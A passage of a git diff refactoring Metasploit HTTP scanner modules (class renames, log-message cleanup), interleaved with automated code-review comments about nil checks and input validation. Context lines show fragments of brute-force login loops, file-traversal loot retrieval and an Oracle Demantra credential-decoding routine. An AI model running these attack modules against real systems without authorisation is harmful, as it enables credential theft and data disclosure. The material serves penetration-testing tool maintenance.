b/modules/auxiliary/scanner/http/mediawiki_svg_fileaccess.rb 
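Review bot: The context line `peer = "#{ip}:#{rport}"` at the top of the `@@ -51,7` hunk in manageengine_securitymanager_traversal.rb has no remaining reader in the visible code, because every `#{peer}` interpolation in this file's hunks is removed. If nothing outside the hunks uses it, the assignment should be deleted with this change. A local named `peer` also shadows the `peer` method that the other modules in this diff were presumably calling, which is worth avoiding in its own right. The method starts and ends outside the hunk.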
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/mod_negotiation_brute.rb b/modules/auxiliary/scanner/http/mod_negotiation_brute.rb index 0c403db076..4a15cd0776 100644 --- a/modules/auxiliary/scanner/http/mod_negotiation_brute.rb +++ b/modules/auxiliary/scanner/http/mod_negotiation_brute.rb @@ -10,7 +10,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/mod_negotiation_scanner.rb b/modules/auxiliary/scanner/http/mod_negotiation_scanner.rb index 8fc76e5fe0..691c59099e 100644 --- a/modules/auxiliary/scanner/http/mod_negotiation_scanner.rb +++ b/modules/auxiliary/scanner/http/mod_negotiation_scanner.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/ms09_020_webdav_unicode_bypass.rb b/modules/auxiliary/scanner/http/ms09_020_webdav_unicode_bypass.rb index 8f60998e85..110daab153 100644 --- a/modules/auxiliary/scanner/http/ms09_020_webdav_unicode_bypass.rb +++ b/modules/auxiliary/scanner/http/ms09_020_webdav_unicode_bypass.rb @@ -7,7 +7,7 @@ require 'rex/proto/http' require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::WmapScanDir diff --git a/modules/auxiliary/scanner/http/ms15_034_http_sys_memory_dump.rb b/modules/auxiliary/scanner/http/ms15_034_http_sys_memory_dump.rb index a0a33b9188..ef0ddc1d8d 100644 --- a/modules/auxiliary/scanner/http/ms15_034_http_sys_memory_dump.rb +++ b/modules/auxiliary/scanner/http/ms15_034_http_sys_memory_dump.rb 
@@ -6,7 +6,7 @@ require 'rex/proto/http' require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner @@ -132,17 +132,17 @@ class Metasploit3 < Msf::Auxiliary res = send_request_raw('uri' => uri) unless res - vprint_error("#{peer} - Connection timed out") + vprint_error("Connection timed out") return file_size end if res.code == 404 - vprint_error("#{peer} - You got a 404. URI must be a valid resource.") + vprint_error("You got a 404. URI must be a valid resource.") return file_size end file_size = res.headers['Content-Length'].to_i - vprint_status("#{peer} - File length: #{file_size} bytes") + vprint_status("File length: #{file_size} bytes") return file_size }.call diff --git a/modules/auxiliary/scanner/http/mybook_live_login.rb b/modules/auxiliary/scanner/http/mybook_live_login.rb index caeca141c7..10a8ce6b42 100644 --- a/modules/auxiliary/scanner/http/mybook_live_login.rb +++ b/modules/auxiliary/scanner/http/mybook_live_login.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'metasploit/framework/credential_collection' require 'metasploit/framework/login_scanner/mybook_live' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/netdecision_traversal.rb b/modules/auxiliary/scanner/http/netdecision_traversal.rb index 0d6064563a..d4fd40dbbc 100644 --- a/modules/auxiliary/scanner/http/netdecision_traversal.rb +++ b/modules/auxiliary/scanner/http/netdecision_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report 
diff --git a/modules/auxiliary/scanner/http/netgear_sph200d_traversal.rb b/modules/auxiliary/scanner/http/netgear_sph200d_traversal.rb index 6644b0b7d4..f6d645fbb2 100644 --- a/modules/auxiliary/scanner/http/netgear_sph200d_traversal.rb +++ b/modules/auxiliary/scanner/http/netgear_sph200d_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner @@ -60,7 +60,7 @@ class Metasploit3 < Msf::Auxiliary }) if res and res.code == 200 and res.body !~ /404\ File\ Not\ Found/ - print_good("#{peer} - Request may have succeeded on file #{file}") + print_good("Request may have succeeded on file #{file}") report_web_vuln({ :host => rhost, :port => rport, @@ -75,9 +75,9 @@ class Metasploit3 < Msf::Auxiliary }) loot = store_loot("lfi.data","text/plain", rhost, res.body, file) - vprint_good("#{peer} - File #{file} downloaded to: #{loot}") + vprint_good("File #{file} downloaded to: #{loot}") elsif res and res.code - vprint_error("#{peer} - Attempt returned HTTP error #{res.code} when trying to access #{file}") + vprint_error("Attempt returned HTTP error #{res.code} when trying to access #{file}") end end @@ -85,7 +85,7 @@ class Metasploit3 < Msf::Auxiliary user = datastore['USERNAME'] pass = datastore['PASSWORD'] - vprint_status("#{peer} - Trying to login with #{user} / #{pass}") + vprint_status("Trying to login with #{user} / #{pass}") # test login begin 
@@ -100,14 +100,14 @@ class Metasploit3 < Msf::Auxiliary return :abort if (res.code == 404) if [200, 301, 302].include?(res.code) - vprint_good("#{peer} - Successful login #{user}/#{pass}") + vprint_good("Successful login #{user}/#{pass}") else - vprint_error("#{peer} - No successful login possible with #{user}/#{pass}") + vprint_error("No successful login possible with #{user}/#{pass}") return :abort end rescue ::Rex::ConnectionError - vprint_error("#{peer} - Failed to connect to the web server") + vprint_error("Failed to connect to the web server") return :abort end diff --git a/modules/auxiliary/scanner/http/nginx_source_disclosure.rb b/modules/auxiliary/scanner/http/nginx_source_disclosure.rb index b49e3e4137..f75163ba05 100644 --- a/modules/auxiliary/scanner/http/nginx_source_disclosure.rb +++ b/modules/auxiliary/scanner/http/nginx_source_disclosure.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/novell_file_reporter_fsfui_fileaccess.rb b/modules/auxiliary/scanner/http/novell_file_reporter_fsfui_fileaccess.rb index bc2663f8f3..9b3dd3137e 100644 --- a/modules/auxiliary/scanner/http/novell_file_reporter_fsfui_fileaccess.rb +++ b/modules/auxiliary/scanner/http/novell_file_reporter_fsfui_fileaccess.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report @@ -51,7 +51,7 @@ class Metasploit4 < Msf::Auxiliary md5 = Rex::Text.md5("SRS" + record + "SERVER").upcase message = md5 + record - print_status("#{peer} - Retrieving the file contents") + print_status("Retrieving the file contents") res = send_request_cgi( { 
@@ -66,9 +66,9 @@ class Metasploit4 < Msf::Auxiliary loot = $1 f = ::File.basename(datastore['RFILE']) path = store_loot('novell.filereporter.file', 'application/octet-stream', rhost, loot, f, datastore['RFILE']) - print_status("#{peer} - #{datastore['RFILE']} saved in #{path}") + print_status("#{datastore['RFILE']} saved in #{path}") else - print_error("#{peer} - Failed to retrieve the file contents") + print_error("Failed to retrieve the file contents") end end diff --git a/modules/auxiliary/scanner/http/novell_file_reporter_srs_fileaccess.rb b/modules/auxiliary/scanner/http/novell_file_reporter_srs_fileaccess.rb index 844c503987..22a5fbd3ea 100644 --- a/modules/auxiliary/scanner/http/novell_file_reporter_srs_fileaccess.rb +++ b/modules/auxiliary/scanner/http/novell_file_reporter_srs_fileaccess.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report @@ -51,7 +51,7 @@ class Metasploit4 < Msf::Auxiliary md5 = Rex::Text.md5("SRS" + record + "SERVER").upcase message = md5 + record - print_status("#{peer} - Retrieving the file contents") + print_status("Retrieving the file contents") res = send_request_cgi( { @@ -66,9 +66,9 @@ class Metasploit4 < Msf::Auxiliary loot = res.body f = ::File.basename(datastore['RFILE']) path = store_loot('novell.filereporter.file', 'application/octet-stream', rhost, loot, f, datastore['RFILE']) - print_status("#{peer} - #{datastore['RFILE']} saved in #{path}") + print_status("#{datastore['RFILE']} saved in #{path}") else - print_error("#{peer} - Failed to retrieve the file contents") + print_error("Failed to retrieve the file contents") end end diff --git a/modules/auxiliary/scanner/http/novell_mdm_creds.rb b/modules/auxiliary/scanner/http/novell_mdm_creds.rb index 3c03a14c2d..7008ed04f3 100644 --- a/modules/auxiliary/scanner/http/novell_mdm_creds.rb +++ b/modules/auxiliary/scanner/http/novell_mdm_creds.rb 
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/ntlm_info_enumeration.rb b/modules/auxiliary/scanner/http/ntlm_info_enumeration.rb index 49e1d33495..b7c4bbfa14 100644 --- a/modules/auxiliary/scanner/http/ntlm_info_enumeration.rb +++ b/modules/auxiliary/scanner/http/ntlm_info_enumeration.rb @@ -4,7 +4,7 @@ ## require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner @@ -92,13 +92,13 @@ class Metasploit3 < Msf::Auxiliary 'headers' => { "Authorization" => "NTLM TlRMTVNTUAABAAAAB4IIogAAAAAAAAAAAAAAAAAAAAAGAbEdAAAADw=="} }) rescue OpenSSL::SSL::SSLError - vprint_error("#{peer} - SSL error") + vprint_error("SSL error") return rescue Errno::ENOPROTOOPT, Errno::ECONNRESET, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError - vprint_error("#{peer} - Unable to Connect") + vprint_error("Unable to Connect") return rescue ::Timeout::Error, ::Errno::EPIPE - vprint_error("#{peer} - Timeout error") + vprint_error("Timeout error") return end diff --git a/modules/auxiliary/scanner/http/open_proxy.rb b/modules/auxiliary/scanner/http/open_proxy.rb index 123e89d6df..6ec76f75bb 100644 --- a/modules/auxiliary/scanner/http/open_proxy.rb +++ b/modules/auxiliary/scanner/http/open_proxy.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/openmind_messageos_login.rb b/modules/auxiliary/scanner/http/openmind_messageos_login.rb index f78d63b8c2..75520d32ff 100644 --- a/modules/auxiliary/scanner/http/openmind_messageos_login.rb +++ b/modules/auxiliary/scanner/http/openmind_messageos_login.rb 
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report @@ -41,7 +41,7 @@ class Metasploit3 < Msf::Auxiliary return end - print_status("#{peer} - Starting login brute force...") + print_status("Starting login brute force...") each_user_pass do |user, pass| do_login(user, pass) end @@ -59,15 +59,15 @@ class Metasploit3 < Msf::Auxiliary 'method' => 'GET' }) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError - vprint_error("#{peer} - HTTP Connection Failed...") + vprint_error("HTTP Connection Failed...") return false end if (res and res.code == 302 and res.headers['Location'] and res.headers['Location'].include?("/provision/index.php")) - vprint_good("#{peer} - Running OpenMind Message-OS Provisioning portal...") + vprint_good("Running OpenMind Message-OS Provisioning portal...") return true else - vprint_error("#{peer} - Application is not OpenMind. Module will not continue.") + vprint_error("Application is not OpenMind. Module will not continue.") return false end end @@ -103,7 +103,7 @@ class Metasploit3 < Msf::Auxiliary # def do_login(user, pass) - vprint_status("#{peer} - Trying username:#{user.inspect} with password:#{pass.inspect}") + vprint_status("Trying username:#{user.inspect} with password:#{pass.inspect}") begin res = send_request_cgi( { 
@@ -116,12 +116,12 @@ class Metasploit3 < Msf::Auxiliary } }) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE - vprint_error("#{peer} - HTTP Connection Failed...") + vprint_error("HTTP Connection Failed...") return :abort end if (res and res.code == 302 and res.headers['Location'].include?("frameset")) - print_good("#{peer} - SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}") + print_good("SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}") report_cred( ip: rhost, port: rport, @@ -132,7 +132,7 @@ class Metasploit3 < Msf::Auxiliary ) return :next_user else - vprint_error("#{peer} - FAILED LOGIN - #{user.inspect}:#{pass.inspect}") + vprint_error("FAILED LOGIN - #{user.inspect}:#{pass.inspect}") end end diff --git a/modules/auxiliary/scanner/http/options.rb b/modules/auxiliary/scanner/http/options.rb index 1839e47ddd..466c9b75c3 100644 --- a/modules/auxiliary/scanner/http/options.rb +++ b/modules/auxiliary/scanner/http/options.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/scanner/http/oracle_demantra_database_credentials_leak.rb b/modules/auxiliary/scanner/http/oracle_demantra_database_credentials_leak.rb index fb87ec82e4..d2a1490cc7 100644 --- a/modules/auxiliary/scanner/http/oracle_demantra_database_credentials_leak.rb +++ b/modules/auxiliary/scanner/http/oracle_demantra_database_credentials_leak.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report 
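Review bot: In `do_login` of openmind_messageos_login.rb (hunk `@@ -116,12`), `res.headers['Location'].include?("frameset")` is called without checking that the header is present, so a 302 response without a Location header raises NoMethodError. The portal check in the `@@ -59,15` hunk of the same file already guards with `res.headers['Location'] and`; the login check should do the same, `res.headers['Location'] && res.headers['Location'].include?("frameset")`. oracle_ilom_login.rb has the same unguarded pattern in its `@@ -57,15` hunk with `res.headers['Server'].include?("Oracle-ILOM-Web-Server")`. `do_login` starts before and ends after this hunk.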
@@ -53,25 +53,25 @@ class Metasploit3 < Msf::Auxiliary }) if res.nil? or res.body.empty? - vprint_error("#{peer} - No content retrieved") + vprint_error("No content retrieved") return end if res.code == 404 - vprint_error("#{peer} - File not found") + vprint_error("File not found") return end if res.code == 200 creds = "" - vprint_status("#{peer} - String received: #{res.body.to_s}") unless res.body.blank? + vprint_status("String received: #{res.body.to_s}") unless res.body.blank? res.body.to_s.split(",").each do|c| i = c.to_i ^ 0x50 creds += i.chr end - print_good("#{peer} - Credentials decoded: #{creds}") unless creds.empty? + print_good("Credentials decoded: #{creds}") unless creds.empty? end end diff --git a/modules/auxiliary/scanner/http/oracle_demantra_file_retrieval.rb b/modules/auxiliary/scanner/http/oracle_demantra_file_retrieval.rb index f536b5a39a..6a078da9a3 100644 --- a/modules/auxiliary/scanner/http/oracle_demantra_file_retrieval.rb +++ b/modules/auxiliary/scanner/http/oracle_demantra_file_retrieval.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/http/oracle_ilom_login.rb b/modules/auxiliary/scanner/http/oracle_ilom_login.rb index bc29b6d04c..de82331fa2 100644 --- a/modules/auxiliary/scanner/http/oracle_ilom_login.rb +++ b/modules/auxiliary/scanner/http/oracle_ilom_login.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report @@ -39,7 +39,7 @@ class Metasploit3 < Msf::Auxiliary return end - print_status("#{peer} - Starting login brute force...") + print_status("Starting login brute force...") each_user_pass do |user, pass| do_login(user, pass) end 
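Review bot: The decode loop in the oracle_demantra_database_credentials_leak.rb hunk trusts every comma-separated token of `res.body`. `c.to_i` maps any non-numeric token to 0 and `i.chr` raises RangeError once the XOR result exceeds 255, so a 200 response that is not the expected number list either prints a meaningless "Credentials decoded" string or ends the host run with an unhandled exception. Checking each token before decoding avoids both, for example `next unless c.strip =~ /\A\d+\z/ && c.to_i <= 0xff` as the first line of the block. The enclosing method starts and ends outside this hunk.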
@@ -57,15 +57,15 @@ class Metasploit3 < Msf::Auxiliary 'method' => 'GET' }) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError - vprint_error("#{peer} - HTTP Connection Failed...") + vprint_error("HTTP Connection Failed...") return false end if (res and res.code == 200 and res.headers['Server'].include?("Oracle-ILOM-Web-Server") and res.body.include?("Integrated Lights Out Manager")) - vprint_good("#{peer} - Running Oracle Integrated Lights Out Manager portal...") + vprint_good("Running Oracle Integrated Lights Out Manager portal...") return true else - vprint_error("#{peer} - Application is not Oracle ILOM. Module will not continue.") + vprint_error("Application is not Oracle ILOM. Module will not continue.") return false end end @@ -102,7 +102,7 @@ class Metasploit3 < Msf::Auxiliary # def do_login(user, pass) - vprint_status("#{peer} - Trying username:#{user.inspect} with password:#{pass.inspect}") + vprint_status("Trying username:#{user.inspect} with password:#{pass.inspect}") begin res = send_request_cgi( { @@ -117,12 +117,12 @@ class Metasploit3 < Msf::Auxiliary } }) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE - vprint_error("#{peer} - HTTP Connection Failed...") + vprint_error("HTTP Connection Failed...") return :abort end if (res and res.code == 200 and res.body.include?("/iPages/suntab.asp") and res.body.include?("SetWebSessionString")) - print_good("#{peer} - SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}") + print_good("SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}") report_cred( ip: rhost, port: rport, @@ -133,7 +133,7 @@ class Metasploit3 < Msf::Auxiliary ) return :next_user else - vprint_error("#{peer} - FAILED LOGIN - #{user.inspect}:#{pass.inspect}") + vprint_error("FAILED LOGIN - #{user.inspect}:#{pass.inspect}") end end 
diff --git a/modules/auxiliary/scanner/http/owa_iis_internal_ip.rb b/modules/auxiliary/scanner/http/owa_iis_internal_ip.rb index 542b5ef896..ea870025cb 100644 --- a/modules/auxiliary/scanner/http/owa_iis_internal_ip.rb +++ b/modules/auxiliary/scanner/http/owa_iis_internal_ip.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/owa_login.rb b/modules/auxiliary/scanner/http/owa_login.rb index b2393bbd3b..efc78770f1 100644 --- a/modules/auxiliary/scanner/http/owa_login.rb +++ b/modules/auxiliary/scanner/http/owa_login.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/proto/ntlm/message' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::AuthBrute @@ -158,7 +158,7 @@ class Metasploit3 < Msf::Auxiliary 'Cookie' => 'PBack=0' } - if (datastore['SSL'].to_s.match(/^(t|y|1)/i)) + if datastore['SSL'] if action.name == "OWA_2013" data = 'destination=https://' << vhost << '/owa&flags=4&forcedownlevel=0&username=' << user << '&password=' << pass << '&isUtf8=1' else diff --git a/modules/auxiliary/scanner/http/pocketpad_login.rb b/modules/auxiliary/scanner/http/pocketpad_login.rb index 8aed527ef6..5c4700f54a 100644 --- a/modules/auxiliary/scanner/http/pocketpad_login.rb +++ b/modules/auxiliary/scanner/http/pocketpad_login.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report @@ -32,7 +32,7 @@ class Metasploit3 < Msf::Auxiliary return end - print_status("#{peer} - Starting login bruteforce...") + print_status("Starting login bruteforce...") each_user_pass do |user, pass| do_login(user, pass) end 
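Review bot: In the owa_login.rb hunk at -158,7, `if datastore['SSL']` is true for every value except nil and false, so it matches the old regex test only if the datastore returns a real boolean at this point. Nothing in the hunk shows that normalization. If the option can still arrive as a string such as "false", the `https://` destination would be built for a plain-HTTP target and every attempt would be misreported. Either confirm that the option is normalized before this line and say so in a comment, or keep an explicit test such as `if datastore['SSL'].to_s =~ /\A(t|y|1)/i`. The enclosing method begins and ends outside the hunk.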
@@ -50,15 +50,15 @@ class Metasploit3 < Msf::Auxiliary 'method' => 'GET' }) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError - vprint_error("#{peer} - HTTP Connection Failed...") + vprint_error("HTTP Connection Failed...") return false end if res && res.code == 200 && res.headers['Server'] && res.headers['Server'].include?("Smeagol") && res.body.include?("PocketPAD") - vprint_good("#{peer} - Running PocketPAD application ...") + vprint_good("Running PocketPAD application ...") return true else - vprint_error("#{peer} - Application is not PocketPAD. Module will not continue.") + vprint_error("Application is not PocketPAD. Module will not continue.") return false end end @@ -95,7 +95,7 @@ class Metasploit3 < Msf::Auxiliary # def do_login(user, pass) - vprint_status("#{peer} - Trying username:#{user.inspect} with password:#{pass.inspect}") + vprint_status("Trying username:#{user.inspect} with password:#{pass.inspect}") begin res = send_request_cgi( { @@ -107,12 +107,12 @@ class Metasploit3 < Msf::Auxiliary } }) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE - vprint_error("#{peer} - HTTP Connection Failed...") + vprint_error("HTTP Connection Failed...") return :abort end if (res && res.code == 200 && res.body.include?("Home Page") && res.headers['Server'] && res.headers['Server'].include?("Smeagol")) - print_good("#{peer} - SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}") + print_good("SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}") report_cred( ip: rhost, port: rport, @@ -123,7 +123,7 @@ class Metasploit3 < Msf::Auxiliary ) return :next_user else - vprint_error("#{peer} - FAILED LOGIN - #{user.inspect}:#{pass.inspect}") + vprint_error("FAILED LOGIN - #{user.inspect}:#{pass.inspect}") end end end 
diff --git a/modules/auxiliary/scanner/http/prev_dir_same_name_file.rb b/modules/auxiliary/scanner/http/prev_dir_same_name_file.rb index fea9b90324..8a219052e8 100644 --- a/modules/auxiliary/scanner/http/prev_dir_same_name_file.rb +++ b/modules/auxiliary/scanner/http/prev_dir_same_name_file.rb @@ -7,7 +7,7 @@ require 'rex/proto/http' require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::WmapScanDir diff --git a/modules/auxiliary/scanner/http/radware_appdirector_enum.rb b/modules/auxiliary/scanner/http/radware_appdirector_enum.rb index 8cf4fdc12f..bc84d5d8a6 100644 --- a/modules/auxiliary/scanner/http/radware_appdirector_enum.rb +++ b/modules/auxiliary/scanner/http/radware_appdirector_enum.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report @@ -45,7 +45,7 @@ class Metasploit3 < Msf::Auxiliary return end - print_status("#{peer} - Starting login brute force...") + print_status("Starting login brute force...") each_user_pass do |user, pass| do_login(user, pass) end @@ -63,15 +63,15 @@ class Metasploit3 < Msf::Auxiliary 'method' => 'GET' }) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError - vprint_error("#{peer} - HTTP Connection Failed, Aborting") + vprint_error("HTTP Connection Failed, Aborting") return false end if (res and res.headers['Server'] and res.headers['Server'].include?("Radware-web-server")) - vprint_good("#{peer} - Running Radware portal...") + vprint_good("Running Radware portal...") return true else - vprint_error("#{peer} - Application is not Radware. Module will not continue.") + vprint_error("Application is not Radware. Module will not continue.") return false end end 
@@ -107,7 +107,7 @@ class Metasploit3 < Msf::Auxiliary # def do_login(user, pass) - vprint_status("#{peer} - Trying username:#{user.inspect} with password:#{pass.inspect}") + vprint_status("Trying username:#{user.inspect} with password:#{pass.inspect}") begin res = send_request_cgi( { @@ -116,12 +116,12 @@ class Metasploit3 < Msf::Auxiliary 'authorization' => basic_auth(user,pass) }) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE - vprint_error("#{peer} - HTTP Connection Failed, Aborting") + vprint_error("HTTP Connection Failed, Aborting") return :abort end if (res and res.code == 302 and res.headers['Location'].include?('redirectId')) - print_good("#{peer} - SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}") + print_good("SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}") report_cred( ip: rhost, port: rport, @@ -132,7 +132,7 @@ class Metasploit3 < Msf::Auxiliary ) return :next_user else - vprint_error("#{peer} - FAILED LOGIN - #{user.inspect}:#{pass.inspect}") + vprint_error("FAILED LOGIN - #{user.inspect}:#{pass.inspect}") end end diff --git a/modules/auxiliary/scanner/http/rails_json_yaml_scanner.rb b/modules/auxiliary/scanner/http/rails_json_yaml_scanner.rb index cb12852868..a156661b3a 100644 --- a/modules/auxiliary/scanner/http/rails_json_yaml_scanner.rb +++ b/modules/auxiliary/scanner/http/rails_json_yaml_scanner.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/rails_mass_assignment.rb b/modules/auxiliary/scanner/http/rails_mass_assignment.rb index 5bdbe7bed5..6016a75b8a 100644 --- a/modules/auxiliary/scanner/http/rails_mass_assignment.rb +++ b/modules/auxiliary/scanner/http/rails_mass_assignment.rb 
@@ -7,7 +7,7 @@ require 'rex/proto/http' require 'msf/core' require 'uri' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::WmapScanUniqueQuery diff --git a/modules/auxiliary/scanner/http/rails_xml_yaml_scanner.rb b/modules/auxiliary/scanner/http/rails_xml_yaml_scanner.rb index 3e6f52150b..c1dfa907e7 100644 --- a/modules/auxiliary/scanner/http/rails_xml_yaml_scanner.rb +++ b/modules/auxiliary/scanner/http/rails_xml_yaml_scanner.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/replace_ext.rb b/modules/auxiliary/scanner/http/replace_ext.rb index 3537b86519..c48ab07a08 100644 --- a/modules/auxiliary/scanner/http/replace_ext.rb +++ b/modules/auxiliary/scanner/http/replace_ext.rb @@ -9,7 +9,7 @@ require 'pathname' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::WmapScanFile diff --git a/modules/auxiliary/scanner/http/rewrite_proxy_bypass.rb b/modules/auxiliary/scanner/http/rewrite_proxy_bypass.rb index a7ce79c852..4da2079121 100644 --- a/modules/auxiliary/scanner/http/rewrite_proxy_bypass.rb +++ b/modules/auxiliary/scanner/http/rewrite_proxy_bypass.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit4 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/http/rfcode_reader_enum.rb b/modules/auxiliary/scanner/http/rfcode_reader_enum.rb index cb103e7da7..9bd3cc4909 100644 --- a/modules/auxiliary/scanner/http/rfcode_reader_enum.rb +++ b/modules/auxiliary/scanner/http/rfcode_reader_enum.rb 
